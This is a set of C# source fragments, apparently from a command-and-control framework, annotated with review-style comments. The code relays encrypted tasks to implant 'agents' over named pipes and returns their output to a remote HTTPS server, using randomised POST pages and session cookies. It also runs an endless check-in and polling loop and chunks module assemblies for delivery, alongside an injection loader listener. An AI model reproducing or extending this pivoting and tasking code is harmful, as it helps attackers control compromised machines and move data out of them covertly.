/// <summary>
/// Sends one task to the agent over <c>pipe</c> and forwards the agent's reply to the server.
/// </summary>
/// <remarks>
/// The task is serialized to JSON, passed through <c>Crypto.Aes.EncryptAesMessage</c> with the
/// web key/IV fields, and written to the pipe. Whatever <c>ReadOutput</c> returns is then posted
/// to an HTTPS URL built from <c>host</c>, <c>port</c> and a randomly chosen entry of
/// <c>pagepost</c>, with a <c>sessionid</c> cookie attached to the web client.
/// NOTE(review): the same key/IV fields are passed on every call; whether IV reuse matters
/// depends on the cipher mode inside EncryptAesMessage, which is not visible here.
/// </remarks>
/// <param name="task">Task message to relay to the agent.</param>
public void ManageCommand(Utility.TaskMsg task)
{
    string serializedTask = new JavaScriptSerializer().Serialize(task);
    StringBuilder output = new StringBuilder();

    try
    {
        // Original note: set agentid with agentpivot
        byte[] encryptedTask = Crypto.Aes.EncryptAesMessage(serializedTask, webaeskey, webaesiv);
        pipe.Write(encryptedTask, 0, encryptedTask.Length);
        output = ReadOutput();

        wc.Add(new Cookie("sessionid", cookie, "/", host));

        // Pick one of the configured POST pages; System.Random is a non-cryptographic PRNG.
        int pageIndex = new Random().Next(pagepost.Length);
        string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[pageIndex]);

        // Send output to server
        Utility.SendOutputHttp(
            task.Instanceid,
            output.ToString(),
            wc,
            webaeskey,
            webaesiv,
            rpaddress,
            param,
            AgentidRelayed,
            agentid);
    }
    catch (IOException e)
    {
        // Only I/O failures are handled here; any other exception propagates to the caller.
        Console.WriteLine("Error during sendcommand agent will be removed {0}", e.Message);
        //TODO remove agent from list
    }

    // Runs on the failure path too; output is then whatever was captured before the error.
    Console.WriteLine(output);
    Console.WriteLine();
}
/// <summary>
/// Stores the task, the pipe to the agent, the web client, the AES key/IV and the agent
/// identity on the new instance. No validation or I/O is performed here.
/// </summary>
/// <param name="task">Task message this executer is created for.</param>
/// <param name="pipe">Client end of the named pipe used to talk to the agent.</param>
/// <param name="wc">Cookie-aware web client kept for later server communication.</param>
/// <param name="aeskey">AES key bytes; the array reference is stored, not copied.</param>
/// <param name="aesiv">AES IV bytes; the array reference is stored, not copied.</param>
/// <param name="agentid">Identifier of the agent.</param>
/// <param name="processname">Process name associated with the agent (usage not visible here).</param>
public CommandExecuter(
    Utility.TaskMsg task,
    NamedPipeClientStream pipe,
    Utility.CookiedWebClient wc,
    byte[] aeskey,
    byte[] aesiv,
    string agentid,
    string processname)
{
    // Identity of the agent this executer serves.
    this.agentid = agentid;
    this.processname = processname;

    // Transport handles.
    this.pipe = pipe;
    this.wc = wc;

    // Key material is held by reference for the lifetime of the instance.
    this.aeskey = aeskey;
    this.aesiv = aesiv;

    this.task = task;
}
/// <summary>
/// Handles the agent-id request and check-in, then polls the shared <c>commands</c> table
/// every five seconds and relays the first queued task for this agent via
/// <c>ManageCommand</c>.
/// </summary>
/// <remarks>
/// Once check-in returns a non-null message the polling loop never exits on its own.
/// Exceptions raised inside one polling pass are swallowed without logging, so a failing
/// relay leaves no trace on the console.
/// NOTE(review): the queued list is read and mutated without any locking visible here —
/// confirm how <c>commands</c> is shared with other threads.
/// </remarks>
public void Run()
{
    // Manage agentid request
    ManageAgentIdRequest();

    try
    {
        Utility.CheckInMsg msg = ManageCheckInMsg();
        if (msg == null)
        {
            // No check-in message: nothing to poll for.
            return;
        }

        // Checked in to the server; wait for commands.
        while (true)
        {
            try
            {
                if (commands.ContainsKey(AgentId))
                {
                    commands.TryGetValue(AgentId, out List<Utility.TaskMsg> pending);
                    if (pending.Count > 0)
                    {
                        // Dequeue the oldest task, send it to the agent and return the
                        // result to the server.
                        Utility.TaskMsg next = pending.First();
                        pending.Remove(next);
                        ManageCommand(next);
                    }
                }
            }
            catch (Exception)
            {
                // Deliberately ignored by the original code; the loop keeps polling.
            }

            Thread.Sleep(5000);
        }
    }
    catch (Exception e)
    {
        Console.WriteLine("[x] Error during checkin agentid {0}", agentid);
        Console.WriteLine("[x] {0}", e.Message);
    }
}
/// <summary>
/// Writes a task to the named pipe as Base64-encoded JSON, splitting the module assembly
/// string into 1024-character chunks when it is longer than 2048 characters.
/// </summary>
/// <remarks>
/// Each chunk is sent as its own <c>Utility.TaskMsg</c> with <c>Chunked = true</c> and
/// <c>ChunkNumber</c> set to the total number of chunks. Nothing in this method encrypts
/// the payload or writes a delimiter between messages; only Base64 encoding is applied.
/// All exceptions are caught and reported on the console, so callers never see a failure.
/// NOTE(review): <c>Encoding.Default</c> depends on the runtime/platform — confirm the
/// reader on the other end of the pipe uses the same encoding.
/// </remarks>
/// <param name="pipe">Server end of the named pipe to write to.</param>
/// <param name="task">Task to send; its <c>ModuleTask.Assembly</c> decides whether chunking is used.</param>
private void SendCommand(NamedPipeServerStream pipe, Utility.TaskMsg task)
{
    try
    {
        if (task.ModuleTask.Assembly.Length > 2048)
        {
            const int chunkSize = 1024;

            Utility.TaskMsg chunkTask = new Utility.TaskMsg
            {
                TaskType = task.TaskType,
                Agentid = task.Agentid,
                AgentPivot = task.AgentPivot,
                Chunked = true
            };

            string assembly = task.ModuleTask.Assembly;

            // Chunk number: full chunks plus one for any remainder.
            int chunkCount = assembly.Length / chunkSize;
            if (assembly.Length % chunkSize != 0)
            {
                chunkCount++;
            }
            chunkTask.ChunkNumber = chunkCount;

            // One config object is reused; only its Assembly slice changes per chunk.
            Utility.ModuleConfig chunkConfig = new Utility.ModuleConfig
            {
                Method = task.ModuleTask.Method,
                Moduleclass = task.ModuleTask.Moduleclass,
                Parameters = task.ModuleTask.Parameters
            };

            // Length > 2048 guarantees at least three chunks, so the loop always runs.
            for (int index = 0; index < chunkCount; index++)
            {
                int offset = index * chunkSize;
                int length = Math.Min(chunkSize, assembly.Length - offset);

                chunkConfig.Assembly = assembly.Substring(offset, length);
                chunkTask.ModuleTask = chunkConfig;

                string chunkJson = new JavaScriptSerializer().Serialize(chunkTask);
                byte[] chunkJsonBytes = Encoding.Default.GetBytes(chunkJson);
                byte[] wireBytes = Encoding.Default.GetBytes(Convert.ToBase64String(chunkJsonBytes));
                pipe.Write(wireBytes, 0, wireBytes.Length);
            }
        }
        else
        {
            // Small payload: send the task as a single unchunked message.
            task.Chunked = false;

            string taskJson = new JavaScriptSerializer().Serialize(task);
            string taskBase64 = Convert.ToBase64String(Encoding.Default.GetBytes(taskJson));
            byte[] wireBytes = Encoding.Default.GetBytes(taskBase64);
            pipe.Write(wireBytes, 0, wireBytes.Length);
        }

        Console.WriteLine("End sendcommand");
    }
    catch (Exception e)
    {
        Console.WriteLine("Error during sendcommand {0}", e.Message);
    }
}
/// <summary>
/// Records the pipe name and the task message on the new instance. The constructor
/// itself opens no pipe and performs no other work.
/// </summary>
/// <param name="pipename">Name of the named pipe this listener is associated with.</param>
/// <param name="command">Task message stored for later use by the listener.</param>
public InjectionLoaderListener(string pipename, Utility.TaskMsg command)
{
    // Stored as given; neither argument is validated here.
    this.command = command;
    this.pipename = pipename;
}